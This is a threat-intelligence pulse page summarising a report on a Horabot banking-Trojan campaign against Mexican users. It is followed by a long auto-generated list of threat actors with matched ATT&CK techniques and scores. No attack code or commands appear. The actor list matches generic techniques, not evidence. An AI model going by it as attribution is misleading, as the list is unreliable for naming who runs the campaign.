Trusted Design

How to uncover a Horabot campaign and detect this malware

概要

This report details the discovery and analysis of a Horabot malware campaign targeting primarily Mexican users. The attack chain begins with a fake CAPTCHA page leading to multiple stages of obfuscated scripts, ultimately delivering an AutoIT loader and a Delphi-based banking Trojan. The malware employs sophisticated encryption techniques, anti-VM checks, and a custom protocol for C2 communication. It also includes a spreader component written in PowerShell that harvests and exfiltrates email addresses to distribute phishing emails. The analysis reveals Brazilian Portuguese comments in the code, suggesting the threat actor's origin. The report provides detection opportunities including YARA rules and hunting queries to identify this threat.

Created: 2026-03-20

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

HAFNIUM

Score: 21.97
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
MITREへのリンク →

menuPass

Score: 8.38
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
MITREへのリンク →

Wizard Spider

Score: 18.22
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1038 - DLL Search Order Hijacking
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1556.009 - Conditional Access Policies
MITREへのリンク →

APT33

Score: 8.01
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1562.012 - Disable or Modify Linux Audit System
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
MITREへのリンク →

Fox Kitten

Score: 15.70
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
MITREへのリンク →

CopyKittens

Score: 3.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1045 - Software Packing
MITREへのリンク →

Volt Typhoon

Score: 33.13
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1176 - Software Extensions
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1574.002 - DLL Side-Loading
MITREへのリンク →

APT1

Score: 5.50
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1136.002 - Domain Account
MITREへのリンク →

Mustang Panda

Score: 17.71
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1218.010 - Regsvr32
MITREへのリンク →

Play

Score: 16.85
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Chimera

Score: 8.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
  • T1059.003 - Windows Command Shell
MITREへのリンク →

Sea Turtle

Score: 22.12
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1499.003 - Application Exhaustion Flood
  • T1063 - Security Software Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
MITREへのリンク →

APT39

Score: 11.52
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
MITREへのリンク →

RedCurl

Score: 9.69
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
MITREへのリンク →

APT5

Score: 12.56
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
MITREへのリンク →

Agrius

Score: 11.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
MITREへのリンク →

GALLIUM

Score: 12.13
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1157 - Dylib Hijacking
MITREへのリンク →

APT41

Score: 46.23
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1041 - Exfiltration Over C2 Channel
  • T1048 - Exfiltration Over Alternative Protocol
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1574.009 - Path Interception by Unquoted Path
  • T1564.003 - Hidden Window
  • T1574.002 - DLL Side-Loading
MITREへのリンク →

MuddyWater

Score: 24.47
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
MITREへのリンク →

APT28

Score: 27.46
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1574.009 - Path Interception by Unquoted Path
  • T1197 - BITS Jobs
  • T1146 - Clear Command History
MITREへのリンク →

Turla

Score: 33.77
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1176 - Software Extensions
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1556.009 - Conditional Access Policies
MITREへのリンク →

Sowbug

Score: 4.10
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
MITREへのリンク →

BRONZE BUTLER

Score: 6.18
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
MITREへのリンク →

UNC3886

Score: 23.95
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1021.006 - Windows Remote Management
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
MITREへのリンク →

Kimsuky

Score: 48.92
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1041 - Exfiltration Over C2 Channel
  • T1055.014 - VDSO Hijacking
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1597 - Search Closed Sources
  • T1027.014 - Polymorphic Code
  • T1197 - BITS Jobs
MITREへのリンク →

APT3

Score: 12.38
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
MITREへのリンク →

FIN8

Score: 8.01
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Ke3chang

Score: 15.53
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
MITREへのリンク →

Lotus Blossom

Score: 6.74
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1219.001 - IDE Tunneling
  • T1505 - Server Software Component
MITREへのリンク →

FIN13

Score: 21.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft
MITREへのリンク →

Earth Lusca

Score: 20.57
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1557.003 - DHCP Spoofing
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1218.001 - Compiled HTML File
MITREへのリンク →

Magic Hound

Score: 45.49
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.005 - Security Support Provider
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1098.002 - Additional Email Delegate Permissions
  • T1547.008 - LSASS Driver
MITREへのリンク →

Aquatic Panda

Score: 7.05
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1120 - Peripheral Device Discovery
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
MITREへのリンク →

INC Ransom

Score: 17.87
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1552.003 - Shell History
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Akira

Score: 14.22
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1137.005 - Outlook Rules
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

ToddyCat

Score: 9.23
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1547.008 - LSASS Driver
MITREへのリンク →

Contagious Interview

Score: 31.93
Matched TTPs:
  • T1044 - File System Permissions Weakness
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1547.005 - Security Support Provider
  • T1021.006 - Windows Remote Management
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1221 - Template Injection
  • T1547.008 - LSASS Driver
MITREへのリンク →

Andariel

Score: 7.80
Matched TTPs:
  • T1171 - LLMNR/NBT-NS Poisoning and Relay
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
MITREへのリンク →

Mustard Tempest

Score: 10.48
Matched TTPs:
  • T1682 - Query Public AI Services
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1557.003 - DHCP Spoofing
MITREへのリンク →

Daggerfly

Score: 3.80
Matched TTPs:
  • T1584.008 - Network Devices
  • T1120 - Peripheral Device Discovery
MITREへのリンク →

APT29

Score: 34.45
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1177 - LSASS Driver
  • T1568 - Dynamic Resolution
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1157 - Dylib Hijacking
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1547.008 - LSASS Driver
MITREへのリンク →

Dragonfly

Score: 24.61
Matched TTPs:
  • T1584.008 - Network Devices
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1657 - Financial Theft
  • T1041 - Exfiltration Over C2 Channel
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
MITREへのリンク →

Threat Group-3390

Score: 16.32
Matched TTPs:
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Ember Bear

Score: 18.23
Matched TTPs:
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1136.002 - Domain Account
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1218.010 - Regsvr32
  • T1519 - Emond
MITREへのリンク →

Axiom

Score: 18.42
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery
  • T1562.013 - Disable or Modify Network Device Firewall
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
MITREへのリンク →

HEXANE

Score: 18.70
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1120 - Peripheral Device Discovery
  • T1547.005 - Security Support Provider
  • T1562.012 - Disable or Modify Linux Audit System
  • T1134.002 - Create Process with Token
  • T1055.014 - VDSO Hijacking
  • T1097 - Pass the Ticket
MITREへのリンク →

Moonstone Sleet

Score: 16.59
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1134.002 - Create Process with Token
  • T1027 - Obfuscated Files or Information
  • T1197 - BITS Jobs
  • T1547.008 - LSASS Driver
MITREへのリンク →

Indrik Spider

Score: 7.66
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Lazarus Group

Score: 26.63
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1608.001 - Upload Malware
  • T1009 - Binary Padding
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1547.008 - LSASS Driver
MITREへのリンク →

OilRig

Score: 34.60
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1574.014 - AppDomainManager
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1048 - Exfiltration Over Alternative Protocol
  • T1097 - Pass the Ticket
  • T1157 - Dylib Hijacking
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1556.009 - Conditional Access Policies
  • T1547.008 - LSASS Driver
MITREへのリンク →

LuminousMoth

Score: 14.58
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1584.005 - Botnet
  • T1574.009 - Path Interception by Unquoted Path
MITREへのリンク →

Sandworm Team

Score: 38.98
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.012 - Disable or Modify Linux Audit System
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1134.002 - Create Process with Token
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1049 - System Network Connections Discovery
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
MITREへのリンク →

Salt Typhoon

Score: 10.44
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
MITREへのリンク →

Aoqin Dragon

Score: 4.89
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
MITREへのリンク →

Moses Staff

Score: 8.88
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
MITREへのリンク →

TeamTNT

Score: 16.31
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1120 - Peripheral Device Discovery
  • T1036.009 - Break Process Trees
  • T1009 - Binary Padding
  • T1219.001 - IDE Tunneling
  • T1597 - Search Closed Sources
  • T1519 - Emond
MITREへのリンク →

FIN7

Score: 25.06
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1608.005 - Link Target
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Scattered Spider

Score: 48.84
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1583.001 - Domains
  • T1547.005 - Security Support Provider
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1219.001 - IDE Tunneling
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
  • T1197 - BITS Jobs
  • T1564.003 - Hidden Window
  • T1027.002 - Software Packing
MITREへのリンク →

Storm-0501

Score: 20.79
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1552.003 - Shell History
  • T1218.005 - Mshta
  • T1097 - Pass the Ticket
  • T1027 - Obfuscated Files or Information
  • T1027.014 - Polymorphic Code
MITREへのリンク →

FIN6

Score: 15.26
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1505 - Server Software Component
  • T1547.008 - LSASS Driver
MITREへのリンク →

BlackTech

Score: 4.41
Matched TTPs:
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.010 - Regsvr32
MITREへのリンク →

Confucius

Score: 8.59
Matched TTPs:
  • T1543.003 - Windows Service
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1218.010 - Regsvr32
MITREへのリンク →

Sidewinder

Score: 13.87
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1218.010 - Regsvr32
MITREへのリンク →

APT32

Score: 22.22
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1547.005 - Security Support Provider
  • T1555.003 - Credentials from Web Browsers
  • T1134.002 - Create Process with Token
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
MITREへのリンク →

Leviathan

Score: 17.81
Matched TTPs:
  • T1543.003 - Windows Service
  • T1140 - Deobfuscate/Decode Files or Information
  • T1555.003 - Credentials from Web Browsers
  • T1055.014 - VDSO Hijacking
  • T1157 - Dylib Hijacking
  • T1027.014 - Polymorphic Code
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
MITREへのリンク →

ZIRCONIUM

Score: 12.62
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1608.005 - Link Target
  • T1197 - BITS Jobs
MITREへのリンク →

EXOTIC LILY

Score: 7.99
Matched TTPs:
  • T1543.003 - Windows Service
  • T1134.002 - Create Process with Token
  • T1218.010 - Regsvr32
  • T1547.008 - LSASS Driver
MITREへのリンク →

Molerats

Score: 3.50
Matched TTPs:
  • T1543.003 - Windows Service
  • T1562.012 - Disable or Modify Linux Audit System
MITREへのリンク →

Windshift

Score: 5.18
Matched TTPs:
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1547.008 - LSASS Driver
MITREへのリンク →

Cobalt Group

Score: 9.82
Matched TTPs:
  • T1543.003 - Windows Service
  • T1518.002 - Backup Software Discovery
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
MITREへのリンク →

TA2541

Score: 11.26
Matched TTPs:
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
MITREへのリンク →

Storm-1811

Score: 15.39
Matched TTPs:
  • T1543.003 - Windows Service
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact
  • T1567.003 - Exfiltration to Text Storage Sites
  • T1547.008 - LSASS Driver
MITREへのリンク →

Patchwork

Score: 9.96
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
MITREへのリンク →

TA505

Score: 10.10
Matched TTPs:
  • T1543.003 - Windows Service
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

LazyScripter

Score: 8.26
Matched TTPs:
  • T1543.003 - Windows Service
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
MITREへのリンク →

APT42

Score: 8.84
Matched TTPs:
  • T1543.003 - Windows Service
  • T1120 - Peripheral Device Discovery
  • T1583.001 - Domains
  • T1562.012 - Disable or Modify Linux Audit System
MITREへのリンク →

Silent Librarian

Score: 10.25
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1134.002 - Create Process with Token
  • T1584.005 - Botnet
  • T1157 - Dylib Hijacking
MITREへのリンク →

Star Blizzard

Score: 10.43
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1547.005 - Security Support Provider
  • T1657 - Financial Theft
  • T1157 - Dylib Hijacking
MITREへのリンク →

CURIUM

Score: 14.86
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1120 - Peripheral Device Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1557.003 - DHCP Spoofing
  • T1218.001 - Compiled HTML File
  • T1547.008 - LSASS Driver
MITREへのリンク →

Windigo

Score: 4.85
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
MITREへのリンク →

BlackByte

Score: 16.48
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1134.001 - Token Impersonation/Theft
  • T1597 - Search Closed Sources
  • T1157 - Dylib Hijacking
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Blue Mockingbird

Score: 11.61
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1027.014 - Polymorphic Code
  • T1505 - Server Software Component
MITREへのリンク →

Darkhotel

Score: 4.00
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1218.010 - Regsvr32
MITREへのリンク →

Rocke

Score: 13.87
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1059.013 - Container CLI/API
MITREへのリンク →

Gamaredon Group

Score: 22.78
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1045 - Software Packing
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1055.014 - VDSO Hijacking
  • T1597 - Search Closed Sources
  • T1061 - Graphical User Interface
  • T1059.013 - Container CLI/API
MITREへのリンク →

APT37

Score: 4.75
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.010 - Regsvr32
MITREへのリンク →

Inception

Score: 11.14
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1027.014 - Polymorphic Code
  • T1218.010 - Regsvr32
MITREへのリンク →

Malteiro

Score: 5.78
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.003 - Shell History
MITREへのリンク →

APT38

Score: 19.05
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1009 - Binary Padding
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1218.012 - Verclsid
  • T1048 - Exfiltration Over Alternative Protocol
  • T1097 - Pass the Ticket
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

SideCopy

Score: 7.17
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
MITREへのリンク →

APT19

Score: 3.95
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1027.014 - Polymorphic Code
MITREへのリンク →

APT18

Score: 3.93
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1219.001 - IDE Tunneling
  • T1157 - Dylib Hijacking
MITREへのリンク →

Tropic Trooper

Score: 9.39
Matched TTPs:
  • T1120 - Peripheral Device Discovery
  • T1555.003 - Credentials from Web Browsers
  • T1219.001 - IDE Tunneling
  • T1683 - Generate Content
